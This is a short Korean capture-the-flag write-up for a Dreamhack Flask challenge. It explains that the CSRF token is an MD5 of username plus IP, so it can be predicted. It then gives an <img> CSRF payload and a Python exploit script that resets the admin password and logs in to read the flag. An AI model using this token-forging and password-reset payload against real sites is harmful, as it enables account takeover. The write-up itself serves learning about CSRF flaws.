반응형
문제풀이
@app.route("/")
def index():
session_id = request.cookies.get('sessionid', None)
try:
username = session_storage[session_id]
except KeyError:
return render_template('index.html', text='please login')
return render_template('index.html', text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not an admin"}')admin으로 로그인하면 flag가 출력된다.
@app.route("/change_password")
def change_password():
session_id = request.cookies.get('sessionid', None)
try:
username = session_storage[session_id]
csrf_token = token_storage[session_id]
except KeyError:
return render_template('index.html', text='please login')
pw = request.args.get("pw", None)
if pw == None:
return render_template('change_password.html', csrf_token=csrf_token)
else:
if csrf_token != request.args.get("csrftoken", ""):
return '<script>alert("wrong csrf token");history.go(-1);</script>'
users[username] = pw
return '<script>alert("Done");history.go(-1);</script>'/change_password를 이용해서 admin 계정의 pw를 바꾸도록 CSRF하면 될 것 같다.
하지만 csrf_token을 이용해서 사용자에 대한 검증을 수행한다.
옳바른 csrf_token을 같이 전송해야 pw를 바꿀 수 있도록 구현됐다.
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'GET':
return render_template('login.html')
elif request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
try:
pw = users[username]
except:
return '<script>alert("user not found");history.go(-1);</script>'
if pw == password:
resp = make_response(redirect(url_for('index')) )
session_id = os.urandom(8).hex()
session_storage[session_id] = username
token_storage[session_id] = md5((username + request.remote_addr).encode()).hexdigest()
resp.set_cookie('sessionid', session_id)
return resp
return '<script>alert("wrong password");history.go(-1);</script>'/login을 보면 csrf_token을 생성하는 방식이 나온다.
token_storage에 저장되는 부분을 보면 알 수 있는데, md5(username + remote_addr).hexdigest()로 구성된다.
충분히 유추가능한 생성방식이라는 것을 알 수 있다.
admin 계정이므로 username은 admin이고 remote_addr은 127.0.0.1이다.
예제 payload를 구성하면 다음과 같다.
<img src='/change_password?pw=123&csrftoken={csrf_token}'></img>csrf 토큰을 같이 전달해서 admin의 pw를 변경하는 payload다.
exploit
from requests import *
from hashlib import *
s = session()
url = "http://host3.dreamhack.games:19214"
csrf_token = md5(('admin' + '127.0.0.1').encode()).hexdigest()
payload = f'''<img src='/change_password?pw=123&csrftoken={csrf_token}'></img>'''
path = "/flag"
data = {'param' : payload}
response = post(url=url+path, data=data)
path = "/login"
data = {'username' : 'admin', 'password' : '123'}
response = post(url=url+path, data=data)
print(response.text)admin의 csrftoken을 생성하고 /change_password를 이용해서 pw를 변경하는 코드다.
실행해보자.
반응형
